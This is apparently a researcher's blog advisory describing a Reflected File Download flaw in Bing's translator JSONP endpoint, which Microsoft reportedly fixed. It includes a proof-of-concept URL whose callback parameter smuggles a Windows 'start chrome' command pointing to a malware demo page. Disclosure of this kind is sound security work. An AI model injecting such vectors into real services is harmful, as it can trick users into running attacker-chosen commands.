David Sopas – Web Security Researcher

acknowledgments

19/01/16 Advisories # , , ,

Bing Reflected File Download

Bing Reflected File Download

When using Bing online translator I noticed a XHR request on my browser that caught my attention:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499

On which reflected on the screen:

jQuery111207287312552798539_1444907172498();

As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm

On which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

0 likes no responses